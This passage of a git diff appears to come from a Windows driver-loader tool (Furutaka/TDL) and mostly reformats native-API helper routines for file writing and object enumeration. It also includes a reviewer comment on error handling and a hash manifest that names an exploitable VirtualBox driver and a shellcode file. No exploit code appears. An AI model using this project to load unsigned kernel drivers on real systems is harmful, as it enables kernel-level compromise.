ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; - if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) - return 0; + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) + return 0; - DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; - dwFlag = FILE_OVERWRITE_IF; + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; - if (Append == TRUE) { - DesiredAccess |= FILE_READ_ACCESS; - dwFlag = FILE_OPEN_IF; - } + if (Append != FALSE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } - InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); - __try { - Status = NtCreateFile(&hFile, DesiredAccess, &attr, - &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, - FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, 
+ FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); - if (!NT_SUCCESS(Status)) - __leave; + if (!NT_SUCCESS(Status)) + __leave; - pPosition = NULL; + pPosition = NULL; - if (Append == TRUE) { - Position.LowPart = FILE_WRITE_TO_END_OF_FILE; - Position.HighPart = -1; - pPosition = &Position; - } + if (Append != FALSE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } - if (Size < 0x80000000) { - BlockSize = (ULONG)Size; - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - BytesWritten += IoStatus.Information; - } - else { - BlockSize = 0x7FFFFFFF; - nBlocks = (Size / BlockSize); - for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - ptr += BlockSize; - BytesWritten += IoStatus.Information; - } - RemainingSize = Size % BlockSize; - if (RemainingSize != 0) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; - BytesWritten += IoStatus.Information; - } - } - } - __finally { - if (hFile != NULL) { - if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus); - NtClose(hFile); - } - RtlFreeUnicodeString(&NtFileName); - } - return BytesWritten; + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = (ULONG)(Size % 
BlockSize); + if (RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + } + return BytesWritten; } /* @@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile( * */ NTSTATUS NTAPI supDetectObjectCallback( - _In_ POBJECT_DIRECTORY_INFORMATION Entry, - _In_ PVOID CallbackParam - ) + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam +) { - POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; - if (Entry == NULL) { - return STATUS_INVALID_PARAMETER_1; - } + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } - if (CallbackParam == NULL) { - return STATUS_INVALID_PARAMETER_2; - } + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } - if (Param->Buffer == NULL || Param->BufferSize == 0) { - return STATUS_MEMORY_NOT_ALLOCATED; - } + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } - if (Entry->Name.Buffer) { - if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { - return STATUS_SUCCESS; - } - } - return STATUS_UNSUCCESSFUL; + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; } /* 
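Review bot: supWriteBufferToFile still reports only `BytesWritten`, so an `NtCreateFile` failure, or an `NtWriteFile` failure part-way through the >2 GB block loop, is indistinguishable from a successful write of a shorter buffer; the `Status` assigned before each `__leave` is discarded in `__finally` and never reaches the caller. The block loop also advances `ptr += BlockSize` by the requested length rather than by `IoStatus.Information`, so if the target ever completes a short synchronous write the skipped bytes are silently lost while the count still grows; a cheap guard after each write is `if (IoStatus.Information != BlockSize) __leave;` (and the same for `RemainingSize`). The new `Append != FALSE` / `Flush != FALSE` comparisons are an improvement over `== TRUE`. Until the status is propagated, the contract deserves a header comment: `// Returns the number of bytes written, 0 on open failure; callers must compare the result with Size, no error status is propagated`.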
@@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback( * */ NTSTATUS NTAPI supEnumSystemObjects( - _In_opt_ LPWSTR pwszRootDirectory, - _In_opt_ HANDLE hRootDirectory, - _In_ PENUMOBJECTSCALLBACK CallbackProc, - _In_opt_ PVOID CallbackParam - ) + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam +) { - BOOL cond = TRUE; - ULONG ctx, rlen; - HANDLE hDirectory = NULL; - NTSTATUS status; - NTSTATUS CallbackStatus; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING sname; + BOOL cond = TRUE; + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; - POBJECT_DIRECTORY_INFORMATION objinf; + POBJECT_DIRECTORY_INFORMATION objinf; - if (CallbackProc == NULL) { - return STATUS_INVALID_PARAMETER_4; - } + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } - status = STATUS_UNSUCCESSFUL; + status = STATUS_UNSUCCESSFUL; - __try { + __try { - // We can use root directory. - if (pwszRootDirectory != NULL) { - RtlSecureZeroMemory(&sname, sizeof(sname)); - RtlInitUnicodeString(&sname, pwszRootDirectory); - InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); - status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); - if (!NT_SUCCESS(status)) { - return status; - } - } - else { - if (hRootDirectory == NULL) { - return STATUS_INVALID_PARAMETER_2; - } - hDirectory = hRootDirectory; - } + // We can use root directory. 
+ if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } - // Enumerate objects in directory. - ctx = 0; - do { + // Enumerate objects in directory. + ctx = 0; + do { - rlen = 0; - status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); - if (status != STATUS_BUFFER_TOO_SMALL) - break; + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; - objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); - if (objinf == NULL) - break; + objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); + if (objinf == NULL) + break; - status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); - if (!NT_SUCCESS(status)) { - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - break; - } + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + break; + } - CallbackStatus = CallbackProc(objinf, CallbackParam); + CallbackStatus = CallbackProc(objinf, CallbackParam); - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - if (NT_SUCCESS(CallbackStatus)) { - status = STATUS_SUCCESS; - break; - } + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } - } while (cond); + } while (cond); - if (hDirectory != NULL) { - NtClose(hDirectory); - } + if (hDirectory != NULL) { + NtClose(hDirectory); + } - } - __except 
(EXCEPTION_EXECUTE_HANDLER) { - status = STATUS_ACCESS_VIOLATION; - } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } - return status; + return status; } /* @@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects( * */ BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ) + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +) { - OBJSCANPARAM Param; + OBJSCANPARAM Param; - if (ObjectName == NULL) { - return FALSE; - } + if (ObjectName == NULL) { + return FALSE; + } - Param.Buffer = ObjectName; - Param.BufferSize = (ULONG)_strlen(ObjectName); + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); - return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); } diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h index e1cd4fa..10bab5d 100644 --- a/Source/Furutaka/sup.h +++ b/Source/Furutaka/sup.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * 
@@ -21,39 +21,39 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); typedef struct _OBJSCANPARAM { - PWSTR Buffer; - ULONG BufferSize; + PWSTR Buffer; + ULONG BufferSize; } OBJSCANPARAM, *POBJSCANPARAM; ULONG_PTR supGetNtOsBase( - VOID - ); + VOID +); PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ); + _In_ SYSTEM_INFORMATION_CLASS InfoClass +); PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ); + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +); BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ); + _In_ BOOL bRestore +); SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ); + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +); BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ); + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +); #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) diff --git a/TDL.sha256 b/TDL.sha256 index 2d5ae90..8a8ffcf 100644 --- a/TDL.sha256 +++ b/TDL.sha256 
@@ -1,29 +1,36 @@
 c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
 4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
-48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
+9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
 01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
 d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
 da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
-c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
 2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
 f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
 d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
 a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
 cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
-c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
-746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
-3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
-cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
-01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
-c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
+e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
+6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
+24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
+16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
 b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
-2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
-1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
-c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
-964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
-8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
+b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
+1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
+94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
+33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
+c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
+8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
+fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
+2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f
*Source\Furutaka\resource.rc
+f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
+fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
+059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
+12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
+cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
 bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
@@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak
 27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
 60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
 87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c
-8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
-fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
-8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
-a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
-2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
-d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
-12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h